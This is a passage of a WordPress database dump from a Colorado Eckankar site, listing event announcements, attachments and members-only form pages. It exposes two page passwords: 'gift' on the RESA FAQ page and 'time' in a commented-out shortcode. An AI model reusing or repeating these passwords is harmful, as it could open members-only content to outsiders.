01:43:22','','','','publish','closed','closed','','269322','','','2023-11-01 19:43:22','2023-11-02 01:43:22','',0,'https://eckankar-colorado.org/nf_sub/269322/',0,'nf_sub','',0),(269152,0,'2023-10-02 18:30:36','2023-10-03 00:30:36','','','','publish','closed','closed','','269152','','','2023-10-02 18:30:36','2023-10-03 00:30:36','',0,'https://eckankar-colorado.org/nf_sub/269152/',0,'nf_sub','',0),(269125,0,'2023-09-30 15:51:46','2023-09-30 21:51:46','','','','publish','closed','closed','','269125','','','2023-09-30 15:51:46','2023-09-30 21:51:46','',0,'https://eckankar-colorado.org/nf_sub/269125/',0,'nf_sub','',0),(269126,0,'2023-09-30 16:29:32','2023-09-30 22:29:32','','','','publish','closed','closed','','269126','','','2023-09-30 16:29:32','2023-09-30 22:29:32','',0,'https://eckankar-colorado.org/nf_sub/269126/',0,'nf_sub','',0),(269127,0,'2023-09-30 17:15:27','2023-09-30 23:15:27','','','','publish','closed','closed','','269127','','','2023-09-30 17:15:27','2023-09-30 23:15:27','',0,'https://eckankar-colorado.org/nf_sub/269127/',0,'nf_sub','',0),(269128,0,'2023-10-01 10:21:21','2023-10-01 16:21:21','','','','publish','closed','closed','','269128','','','2023-10-01 10:21:21','2023-10-01 16:21:21','',0,'https://eckankar-colorado.org/nf_sub/269128/',0,'nf_sub','',0),(269129,0,'2023-10-01 13:24:34','2023-10-01 19:24:34','','','','publish','closed','closed','','269129','','','2023-10-01 13:24:34','2023-10-01 19:24:34','',0,'https://eckankar-colorado.org/nf_sub/269129/',0,'nf_sub','',0),(269130,0,'2023-10-01 13:26:08','2023-10-01 19:26:08','','','','publish','closed','closed','','269130','','','2023-10-01 13:26:08','2023-10-01 19:26:08','',0,'https://eckankar-colorado.org/nf_sub/269130/',0,'nf_sub','',0),(269131,0,'2023-10-01 13:32:24','2023-10-01 19:32:24','','','','publish','closed','closed','','269131','','','2023-10-01 13:32:24','2023-10-01 19:32:24','',0,'https://eckankar-colorado.org/nf_sub/269131/',0,'nf_sub','',0),(269132,0,'2023-10-01 14:09:07','2023-10-01 20:09:07','','','','publish','closed','closed','','269132','','','2023-10-01 14:09:07','2023-10-01 20:09:07','',0,'https://eckankar-colorado.org/nf_sub/269132/',0,'nf_sub','',0),(269133,0,'2023-10-01 14:39:09','2023-10-01 20:39:09','','','','publish','closed','closed','','269133','','','2023-10-01 14:39:09','2023-10-01 20:39:09','',0,'https://eckankar-colorado.org/nf_sub/269133/',0,'nf_sub','',0),(269186,0,'2023-10-09 22:26:47','2023-10-10 04:26:47','','','','publish','closed','closed','','269186','','','2023-10-09 22:26:47','2023-10-10 04:26:47','',0,'https://eckankar-colorado.org/nf_sub/269186/',0,'nf_sub','',0),(269135,0,'2023-10-01 16:37:39','2023-10-01 22:37:39','','','','publish','closed','closed','','269135','','','2023-10-01 16:37:39','2023-10-01 22:37:39','',0,'https://eckankar-colorado.org/nf_sub/269135/',0,'nf_sub','',0),(269136,0,'2023-10-02 01:09:19','2023-10-02 07:09:19','','','','publish','closed','closed','','269136','','','2023-10-02 01:09:19','2023-10-02 07:09:19','',0,'https://eckankar-colorado.org/nf_sub/269136/',0,'nf_sub','',0),(269137,0,'2023-10-02 11:55:22','2023-10-02 17:55:22','','','','publish','closed','closed','','269137','','','2023-10-02 11:55:22','2023-10-02 17:55:22','',0,'https://eckankar-colorado.org/nf_sub/269137/',0,'nf_sub','',0),(269140,2,'2023-10-02 13:36:02','2023-10-02 19:36:02','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">We look forward to connecting with you! Please visit us and share your experiences, questions and love of all things spiritual.<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Do you want to learn more about how to discover the meaning of your dreams?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Maybe you would like to learn more about Past Lives or Soul Travel.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This is a great opportunity to speak with members of Eckankar, browse materials to learn on your own, or just to have a chat. We would love to see you there.</span></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><strong><span style=\"font-size: 14pt;\">Friday thru Sunday -- October 6 - 8<br>\r\n</span><span style=\"font-size: 14pt;\">At the Colorado Springs Event Center </span></strong><br>\r\n<strong><span style=\"font-size: 14pt;\">3960 Palmer Park Blvd.</span></strong><br>\r\n<strong><span style=\"font-size: 14pt;\">Colorado Springs, CO</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Whatever your spiritual interest, please stop by and say hello.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Bring your friends!</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Eckankar Booth at Body Mind Spirit Celebration','','publish','closed','closed','','eckankar-booth-at-body-mind-spirit-celebration','','','2023-10-02 14:08:53','2023-10-02 20:08:53','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269140',0,'mec-events','',0),(269141,2,'2023-10-02 13:17:46','2023-10-02 19:17:46','','2023-body-mind-spirit-expo','','inherit','closed','closed','','2023-body-mind-spirit-expo','','','2023-10-02 13:17:46','2023-10-02 19:17:46','',269140,'https://eckankar-colorado.org/wp-content/uploads/2023/10/2023-body-mind-spirit-expo.jpg',0,'attachment','image/jpeg',0),(269143,2,'2023-10-02 13:51:55','2023-10-02 19:51:55','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 15pt;\">The <strong>Colorado Springs ECK Center</strong> will be live-streaming the upcoming \'ECK Light and Sound Service\' from the ECK Temple of Colorado. The program will be shown on a large TV for all to enjoy. You are warmly invited to join us for this in person event.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','ELSS LIVE STREAMING for COLORADO SPRINGS','','publish','closed','closed','','elss-live-streaming-for-colorado-springs','','','2023-10-02 13:56:07','2023-10-02 19:56:07','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269143',0,'mec-events','',0),(269144,2,'2023-10-02 14:02:05','2023-10-02 20:02:05','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\"><span style=\"font-size: 18pt; color: #eb9809;\">Video and Spiritual Discussion.</span> <br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to watch a 30 minute video presentation of a talk by Sri Harold Klemp, Spiritual Leader of Eckankar. It will be followed by a discussion on the spiritual topics mentioned in the talk. Come and share your thoughts and insights with other like-minded individuals.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Video presentations of Sri Harold Klemp offer a unique opportunity to hear stories and spiritual insights that bring meaning, connection, and humor to the workings of Spirit in our everyday lives.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">All are warmly welcome.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Five Spiritual Laws of This World','','publish','open','closed','','five-spiritual-laws-of-this-world','','','2023-10-02 14:02:05','2023-10-02 20:02:05','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269144',0,'mec-events','',0),(269145,2,'2023-10-02 14:01:18','2023-10-02 20:01:18','','sunset-lake-6','','inherit','closed','closed','','sunset-lake-6','','','2023-10-02 14:01:18','2023-10-02 20:01:18','',269144,'https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-lake-6.jpg',0,'attachment','image/jpeg',0),(269147,2,'2023-10-02 14:25:19','2023-10-02 20:25:19','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ce0000;\">--Due To Weather - This Event Is Canceled--</span></strong></p>\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Spiritual discussions are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy.<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Fifth Sunday this month, rather than the usual fourth Sunday</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','The Spiritual Law of Grace and Divine Love','','publish','closed','closed','','the-spiritual-law-of-grace-and-divine-love','','','2023-10-29 11:34:30','2023-10-29 17:34:30','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269147',0,'mec-events','',0),(269148,2,'2023-10-02 14:24:34','2023-10-02 20:24:34','','maze-sunrise-1','','inherit','closed','closed','','maze-sunrise-1','','','2023-10-02 14:24:34','2023-10-02 20:24:34','',269147,'https://eckankar-colorado.org/wp-content/uploads/2023/10/maze-sunrise-1.jpg',0,'attachment','image/jpeg',0),(269149,2,'2023-10-02 14:29:27','2023-10-02 20:29:27','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>September 2023</strong> edition of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copy of the issue on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at <a class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 400;\" href=\"http://www.eckankar.org\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar.org</a> in the Members Area under \"<em>Your Spiritual Studies</em>.</span></strong></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Initiate Newsletter.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>','Mystic World Discussion','','publish','closed','closed','','mystic-world-discussion-online-template-2','','','2023-10-02 14:39:10','2023-10-02 20:39:10','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269149',0,'mec-events','',0),(269323,2,'2023-11-02 09:41:46','2023-11-02 15:41:46','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Spiritual discussions are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy.<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','The Spiritual Laws of Life','','publish','closed','closed','','the-spiritual-laws-of-life','','','2023-11-02 09:41:46','2023-11-02 15:41:46','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269323',0,'mec-events','',0),(269324,2,'2023-11-02 14:28:55','2023-11-02 20:28:55','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Discover HU, A Natural Way to Connect with Spirit.<br>\r\n</span></strong></span><span style=\"font-size: 20pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Here are some of the many benefits of HU:</span></strong></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Tune Into the God Force','','publish','closed','closed','','tune-into-the-god-force','','','2023-11-02 14:31:02','2023-11-02 20:31:02','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269324',0,'mec-events','',0),(68742,2,'2019-07-29 11:05:13','2019-07-29 17:05:13','','ek-sym-gold-sm','','inherit','open','closed','','ek-sym-gold-sm','','','2019-07-29 11:05:13','2019-07-29 17:05:13','',68102,'https://eckankar-colorado.org/wp-content/uploads/2019/07/ek-sym-gold-sm.png',0,'attachment','image/png',0),(70160,2,'2019-07-29 13:08:17','2019-07-29 19:08:17','','ETC Org Chart 3-15-2019','','inherit','open','closed','','etc-org-chart-3-15-2019','','','2019-12-16 10:26:30','2019-12-16 17:26:30','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/07/ETC-Org-Chart-3-15-2019.pdf',0,'attachment','application/pdf',0),(70278,2,'2019-07-29 13:14:32','2019-07-29 19:14:32','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 60px; padding-bottom: 50px;\">\r\n<div class=\"nf-field-element\"></div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n<p>[ninja_form id=4]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','UPDATE EMAIL OR MAIL ADDRESS - MEMBER','','publish','closed','closed','','update-email-mail','','','2022-02-17 09:54:03','2022-02-17 16:54:03','',79666,'https://eckankar-colorado.org/?page_id=70278',0,'page','',0),(70845,2,'2019-07-29 13:37:04','2019-07-29 19:37:04','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 50px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n<p>[ninja_form id=10]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','RESA Organization Communications','','publish','closed','closed','','resa-organization-communications','','','2020-08-06 09:11:14','2020-08-06 15:11:14','',79666,'https://eckankar-colorado.org/?page_id=70845',0,'page','',0),(71622,2,'2019-07-29 14:06:20','2019-07-29 20:06:20','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 50px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n<p>[ninja_form id=5]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Alamosa Initiators and ESA’s','','publish','closed','closed','','alamosa-initiators-and-esas','','','2020-08-06 09:03:45','2020-08-06 15:03:45','',79666,'https://eckankar-colorado.org/?page_id=71622',0,'page','',0),(71767,2,'2019-07-29 14:08:05','2019-07-29 20:08:05','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 50px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n<p>[ninja_form id=6]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Boulder Area Initiators and ESA\'s','','publish','closed','closed','','boulder-area-initiators-and-esas','','','2020-08-06 09:04:58','2020-08-06 15:04:58','',79666,'https://eckankar-colorado.org/?page_id=71767',0,'page','',0),(71864,2,'2019-07-29 14:14:15','2019-07-29 20:14:15','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 50px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p>[ninja_form id=32]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Central Colorado Initiators and ESA\'s','','publish','closed','closed','','central-colorado-initiators-and-esas','','','2020-08-06 09:05:24','2020-08-06 15:05:24','',79666,'https://eckankar-colorado.org/?page_id=71864',0,'page','',0),(72053,2,'2019-07-29 14:14:38','2019-07-29 20:14:38','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 50px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n<p>[ninja_form id=11]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Colorado Springs Initiators and ESA\'s','','publish','closed','closed','','colorado-springs-initiators-and-esas','','','2020-08-06 09:05:37','2020-08-06 15:05:37','',79666,'https://eckankar-colorado.org/?page_id=72053',0,'page','',0),(72150,2,'2019-07-29 14:15:32','2019-07-29 20:15:32','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 50px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\">[ninja_form id=14]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Johnstown Initiators and ESA\'s','','publish','closed','closed','','johnstown-initiators-and-esas','','','2020-08-06 09:06:01','2020-08-06 15:06:01','',79666,'https://eckankar-colorado.org/?page_id=72150',0,'page','',0),(72247,2,'2019-07-29 14:16:21','2019-07-29 20:16:21','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 50px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n<p class=\"\">[ninja_form id=15]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Longmont Area Initiators and ESA\'s','','publish','closed','closed','','longmont-area-initiators-and-esas','','','2020-08-06 09:06:19','2020-08-06 15:06:19','',79666,'https://eckankar-colorado.org/?page_id=72247',0,'page','',0),(72344,2,'2019-07-29 14:17:10','2019-07-29 20:17:10','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 50px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n<p>[ninja_form id=2]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Loveland Area Initiators and ESA\'s','','publish','closed','closed','','loveland-area-initiators-and-esas','','','2020-08-06 09:06:32','2020-08-06 15:06:32','',79666,'https://eckankar-colorado.org/?page_id=72344',0,'page','',0),(72441,2,'2019-07-29 14:18:08','2019-07-29 20:18:08','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 50px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n<p>[ninja_form id=19]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Northwest Mountain Area Initiators and ESA\'s','','publish','closed','closed','','northwest-mountain-area-initiators-and-esas','','','2020-08-06 09:06:48','2020-08-06 15:06:48','',79666,'https://eckankar-colorado.org/?page_id=72441',0,'page','',0),(72538,2,'2019-07-29 14:19:02','2019-07-29 20:19:02','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 50px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n<p>[ninja_form id=20]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Parker Area Initiators and ESA\'s','','publish','closed','closed','','parker-area-initiators-and-esas','','','2020-08-06 09:07:02','2020-08-06 15:07:02','',79666,'https://eckankar-colorado.org/?page_id=72538',0,'page','',0),(72635,2,'2019-07-29 14:19:53','2019-07-29 20:19:53','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 50px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n<p>[ninja_form id=22]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Pueblo Area Initiators and ESA\'s','','publish','closed','closed','','pueblo-area-initiators-and-esas','','','2020-08-06 09:08:01','2020-08-06 15:08:01','',79666,'https://eckankar-colorado.org/?page_id=72635',0,'page','',0),(72732,2,'2019-07-29 14:20:49','2019-07-29 20:20:49','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 50px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n<p>[ninja_form id=23]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Southwest Mountain Area Initiators and ESA\'s','','publish','closed','closed','','southwest-mountain-area-initiators-and-esas','','','2020-08-06 09:07:33','2020-08-06 15:07:33','',79666,'https://eckankar-colorado.org/?page_id=72732',0,'page','',0),(78665,2,'2019-07-31 21:16:32','2019-08-01 03:16:32','','rocks-water','','inherit','open','closed','','rocks-water','','','2019-07-31 21:16:32','2019-08-01 03:16:32','',33457,'https://eckankar-colorado.org/wp-content/uploads/2019/07/rocks-water.jpg',0,'attachment','image/jpeg',0),(79365,2,'2019-08-01 11:46:19','2019-08-01 17:46:19','','RESA FAQ','','publish','closed','closed','','resa-faq','','','2019-10-11 15:44:05','2019-10-11 21:44:05','',0,'https://eckankar-colorado.org/?post_type=responsive_accordion&#038;p=79365',0,'responsive_accordion','',0),(79666,2,'2019-08-01 11:49:06','2019-08-01 17:49:06','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 60px; padding-bottom: 44px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div class=\"tmpl-call_to_action-12 boldgrid-section dynamic-gridblock background-scroll\" style=\"color: #1d1d1d; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.66), rgba(255, 255, 255, 0.66)), url(\'https://eckankar-colorado.org/wp-content/uploads/2019/08/water-rocks-2.jpg\'); background-size: cover; background-position: 50% 48%;\" data-bg-overlaycolor=\"rgba(255,255,255,0.60)\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2019/08/water-rocks-2.jpg\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 75px; padding-bottom: 100px;\">\r\n<div class=\"col-md-2 col-sm-1 col-xs-12 col-lg-2\"></div>\r\n<div class=\"col-md-8 col-sm-10 col-xs-12 text-center col-lg-8\">\r\n<h1 class=\"color2-color\" style=\"text-transform: uppercase; font-size: 52px;\">RESA FAQ</h1>\r\n<div class=\"row bg-editor-hr-wrap\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div>\r\n<hr class=\"color2-color bg-hr-2 bg-hr\" style=\"margin-bottom: 30px; margin-right: auto; margin-left: auto;\" width=\"50%\"></div>\r\n</div>\r\n</div>\r\n<p class=\"\" style=\"font-size: 23px;\">Frequently Asked Questions<br>\r\nAbout RESA Organization Positions</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 25px; padding-bottom: 25px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div>\r\n<p>[WPSM_AC id=79365]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','RESA FAQ','','publish','closed','closed','gift','resa-faq','','','2023-08-28 21:17:27','2023-08-29 03:17:27','',0,'https://eckankar-colorado.org/?page_id=79666',0,'page','',0),(80323,2,'2019-08-01 12:23:37','2019-08-01 18:23:37','','water-rocks-2','','inherit','open','closed','','water-rocks-2','','','2019-08-01 12:23:37','2019-08-01 18:23:37','',79666,'https://eckankar-colorado.org/wp-content/uploads/2019/08/water-rocks-2.jpg',0,'attachment','image/jpeg',0),(80983,2,'2019-08-01 13:14:01','2019-08-01 19:14:01','','moon-grass','','inherit','open','closed','','moon-grass','','','2019-08-01 13:14:01','2019-08-01 19:14:01','',32337,'https://eckankar-colorado.org/wp-content/uploads/2019/08/moon-grass.jpg',0,'attachment','image/jpeg',0),(81469,2,'2019-08-01 15:02:54','2019-08-01 21:02:54','','moon-river','','inherit','open','closed','','moon-river','','','2019-08-01 15:02:54','2019-08-01 21:02:54','',68102,'https://eckankar-colorado.org/wp-content/uploads/2019/08/moon-river.jpg',0,'attachment','image/jpeg',0),(83948,2,'2019-08-02 15:23:33','2019-08-02 21:23:33','','ek-logo-med-blue','','inherit','open','closed','','ek-logo-med-blue','','','2019-08-02 15:23:33','2019-08-02 21:23:33','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ek-logo-med-blue.png',0,'attachment','image/png',0),(88712,2,'2019-08-04 19:13:24','2019-08-05 01:13:24','<div class=\"boldgrid-section\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 100px; padding-bottom: 100px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div>\r\n<p>[ninja_form id=17]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n<!--<p>[passster password=\"time\"][ninja_form id=17][/passster]</p>-->','Newsletter Subscription -- MEMBERS','','publish','closed','closed','','newsletter-subscription-members','','','2019-12-26 16:21:20','2019-12-26 23:21:20','',79666,'https://eckankar-colorado.org/?page_id=88712',0,'page','',0),(89020,2,'2019-08-04 19:19:51','2019-08-05 01:19:51','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 100px; padding-bottom: 